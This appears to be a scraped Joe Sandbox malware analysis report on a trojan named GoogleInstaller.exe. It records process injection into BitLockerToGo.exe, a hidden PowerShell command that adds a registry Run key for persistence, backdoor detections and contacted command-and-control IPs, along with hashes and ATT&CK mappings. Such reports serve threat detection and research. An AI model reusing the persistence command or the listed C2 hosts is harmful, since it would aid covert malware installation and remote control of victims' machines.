    Source: C:\Users\user\Desktop\GoogleInstaller.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 32A9000Jump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"Jump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe\" }"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeQueries volume information: C:\Users\user\Desktop\GoogleInstaller.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\GoogleInstaller.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected GO Backdoor
    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6512, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected GO Backdoor
    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6512, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
    Command and Scripting Interpreter    		11
    Registry Run Keys / Startup Folder    		311
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote ServicesData from Local System1
    Non-Standard Port    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		1
    DLL Side-Loading    		11
    Registry Run Keys / Startup Folder    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		311
    Process Injection    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture1
    Proxy    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets11
    System Information Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    GoogleInstaller.exe13%ReversingLabs

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://aka.ms/pscore6lB0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    198.187.3.20.in-addr.arpa
    		unknown
    		unknowntrue
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://46.8.232.106/false
        		unknown
        http://46.8.236.61/false
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://protobuf.dev/reference/go/faq#namespace-conflictdurationGoogleInstaller.exefalse
            		unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2473404910.0000000005451000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmpfalse
              		unknown
              http://46.8.232.106BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmpfalse
                		unknown
                https://contoso.com/powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.microsoft.copowershell.exe, 00000006.00000002.2487699090.0000000007A24000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/golang/protobuf/issues/1609):GoogleInstaller.exefalse
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://93.185.159.253BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmpfalse
                      		unknown
                      http://46.8.236.61BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmpfalse
                        		unknown
                        http://91.212.166.91User-Agent:BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmpfalse
                          		unknown
                          http://91.212.166.91http://46.8.232.106BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2473404910.0000000005451000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://91.212.166.91BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCC0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                46.8.232.106
                                		unknownRussian Federation
                                		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                46.8.236.61
                                		unknownRussian Federation
                                		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                94.103.90.9
                                		unknownRussian Federation
                                		48282VDSINA-ASRUtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1524043
                                Start date and time:2024-10-02 15:12:40 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 29s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Run name:Run with higher sleep bypass
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:GoogleInstaller.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@7/4@1/3
                                EGA Information:Failed
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target BitLockerToGo.exe, PID 6512 because there are no executed function
                                • Execution Graph export aborted for target GoogleInstaller.exe, PID 4188 because there are no executed function
                                • Execution Graph export aborted for target powershell.exe, PID 1216 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • VT rate limit hit for: GoogleInstaller.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:13:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                15:14:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                94.103.90.9SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllGet hashmaliciousGO BackdoorBrowse
                                  SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllGet hashmaliciousGO BackdoorBrowse
                                    file.dllGet hashmaliciousUnknownBrowse
                                      file.exeGet hashmaliciousUnknownBrowse
                                        441vdCp7gV.exeGet hashmaliciousUnknownBrowse
                                          Z5SPXXNxC2.exeGet hashmaliciousUnknownBrowse
                                            bca1b830105b7ffeae00fea5f3a993586d0b85e9e3ef2.exeGet hashmaliciousAmadeyBrowse
                                              eBVZ89cKVG.exeGet hashmaliciousLummaC Stealer, RedLine, SectopRATBrowse
                                                ystCwvqbxR.exeGet hashmaliciousLummaC Stealer, RedLine, SectopRATBrowse

                                                  Domains

                                                  No context

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  VDSINA-ASRUImplosions.exeGet hashmaliciousRedLineBrowse
                                                  • 109.234.38.212
                                                  aisuru.arm.elfGet hashmaliciousUnknownBrowse
                                                  • 94.103.83.102
                                                  PQ2AUndsdb.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                                  • 62.113.117.95
                                                  SecuriteInfo.com.Win32.PWSX-gen.663.14886.exeGet hashmaliciousXRed, XWormBrowse
                                                  • 62.113.117.95
                                                  SecuriteInfo.com.BackDoor.AsyncRATNET.1.5719.7945.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                  • 62.113.117.95
                                                  ExeFile (88).exeGet hashmaliciousRedLineBrowse
                                                  • 94.103.86.184
                                                  SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllGet hashmaliciousGO BackdoorBrowse
                                                  • 94.103.90.9
                                                  SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllGet hashmaliciousGO BackdoorBrowse
                                                  • 94.103.90.9
                                                  SecuriteInfo.com.Win32.Malware-gen.26009.9463.exeGet hashmaliciousGO BackdoorBrowse
                                                  • 195.2.70.38
                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                  • 94.103.91.233
                                                  FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109
                                                  N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 46.8.231.109

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1264
                                                  Entropy (8bit):5.367738859690877
                                                  Encrypted:false
                                                  SSDEEP:24:3F5WSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R8O9r/:vWSU4y4RQmFoUeUmfmZ9tlNWR8GT
                                                  MD5:7ECC7556B9A908C6CF1EF9ECB063E1F1
                                                  SHA1:3C6A4F28C753EAA03D574F8C5CD20BDC4F98704D
                                                  SHA-256:4DF8E04AB0AAB39A19D4DCD4925843F2692EF0007A3E174A21A446E4090C69FA
                                                  SHA-512:B41025C9CA47A7E2E1122191C3F5E3E67CA5EC7D6FBDC1C2FB9E599465670DF8E81E95E0181FEEF0660C2E0930D8FA606840BD4C472CBCD5AB1889D808965CAE
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_511l3j2j.si2.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxwq2z0d.deo.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\config

                                                  Download File
                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):324
                                                  Entropy (8bit):6.182064437157936
                                                  Encrypted:false
                                                  SSDEEP:6:5/Ksn3fYPA9gC9M9z8ykhDVOJh3Z5pj2CYId6BkIwE2EmAHnNNben:hF3fYL83Mv3bZIz2+nN8
                                                  MD5:F0EC2EB78EB25A163F428EA84FCD52A7
                                                  SHA1:6F7D4B76636C42FCF8FA459A85436C22BC55D72A
                                                  SHA-256:BFD2FA609209C7FDDDB24EA9C5828093F8B5346CF737EC1F523FD8933B607B4D
                                                  SHA-512:18A7095AD9CCD0D82E551F4C07AE15A6E4CFA27C6C7DE7C9412A225389DAC2B6C50AACC4C49933024EB3E7C50122224316C510A2A3F97D29604CB4697C68B357
                                                  Malicious:false
                                                  Preview:......U<..\0..!_SQ."A4..L.Y5]U ]X6*=M.)QQ..\@ PSQ&4"Z.%.\(#.MX.$X!2.^%=TU.&.EP...*.....Q..P!.(.UY.".F..WA..?W?."_/'.@..?[.-.G*..\.Y2PV_*_...@.[.U.*4X.!#BS....)+.0.Y.Q...Y..S.9\A-+7L.=.P!3"].Y0M"\7X^'%V.*VV..%G..._! .V./RP2..@.\.Q.-5\UU.]...O<*T...W......=6....TR;.L.)SFS+#W.^2R"..G.1\\.,+R.?.["Q6@.= R(.!_...XR^)M.?^P>."_".S

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.385894507715907
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:GoogleInstaller.exe
                                                  File size:17'015'808 bytes
                                                  MD5:3d429d9f74da7b1f95ea8db8a486ed20
                                                  SHA1:6e7d73e9fb4b67f0587cd7d6dbbabe72be42fa2e
                                                  SHA256:e1224cbff7ca30da4bbfeab556bf76f73576d76ae3cf42f49e778ca16ced6f15
                                                  SHA512:8d5a18cc9f90be598fa55f100490e3cd54f0907f99c4d9ffc0546a622754ea42df93ba1fb342487398897a4ec031ee4d46c86f36dda6eb3a8d376528af2af396
                                                  SSDEEP:393216:mLmKWTUoQsNAT3jhXjglcUN1Ix/LfPZGcg:UzMcCIf
                                                  TLSH:2307BE01FAD748F1E943583190ABB22F53345E054B28DBEBEA947F2AF9772824D33255
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................>......... .............@..........................p............@................................

                                                  File Icon

                                                  Icon Hash:f0d555131935e6e8

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x471820
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:1
                                                  File Version Major:6
                                                  File Version Minor:1
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:1
                                                  Import Hash:4f2f006e2ecf7172ad368f8289dc96c1

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp 00007FA878FBE4F0h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  sub esp, 28h
                                                  mov dword ptr [esp+1Ch], ebx
                                                  mov dword ptr [esp+10h], ebp
                                                  mov dword ptr [esp+14h], esi
                                                  mov dword ptr [esp+18h], edi
                                                  mov dword ptr [esp], eax
                                                  mov dword ptr [esp+04h], ecx
                                                  call 00007FA878FA2796h
                                                  mov eax, dword ptr [esp+08h]
                                                  mov edi, dword ptr [esp+18h]
                                                  mov esi, dword ptr [esp+14h]
                                                  mov ebp, dword ptr [esp+10h]
                                                  mov ebx, dword ptr [esp+1Ch]
                                                  add esp, 28h
                                                  retn 0004h
                                                  ret
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  sub esp, 08h
                                                  mov ecx, dword ptr [esp+0Ch]
                                                  mov edx, dword ptr [ecx]
                                                  mov eax, esp
                                                  mov dword ptr [edx+04h], eax
                                                  sub eax, 00010000h
                                                  mov dword ptr [edx], eax
                                                  add eax, 00000BA0h
                                                  mov dword ptr [edx+08h], eax
                                                  mov dword ptr [edx+0Ch], eax
                                                  lea edi, dword ptr [ecx+34h]
                                                  mov dword ptr [edx+18h], ecx
                                                  mov dword ptr [edi], edx
                                                  mov dword ptr [esp+04h], edi
                                                  call 00007FA878FC0944h
                                                  cld
                                                  call 00007FA878FBF9DEh
                                                  call 00007FA878FBE619h
                                                  add esp, 08h
                                                  ret
                                                  jmp 00007FA878FC07F0h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  mov ebx, dword ptr [esp+04h]
                                                  mov ebp, esp
                                                  mov dword ptr fs:[00000034h], 00000000h
                                                  mov ecx, dword ptr [ebx+04h]
                                                  cmp ecx, 00000000h
                                                  je 00007FA878FC07F1h
                                                  mov eax, ecx
                                                  shl eax, 02h
                                                  sub esp, eax
                                                  mov edi, esp
                                                  mov esi, dword ptr [ebx+08h]
                                                  cld
                                                  rep movsd

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x102a0000x45e.idata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x105d0000x29c22.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x102b0000x30eb2.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0xf9bd800xb8.data
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
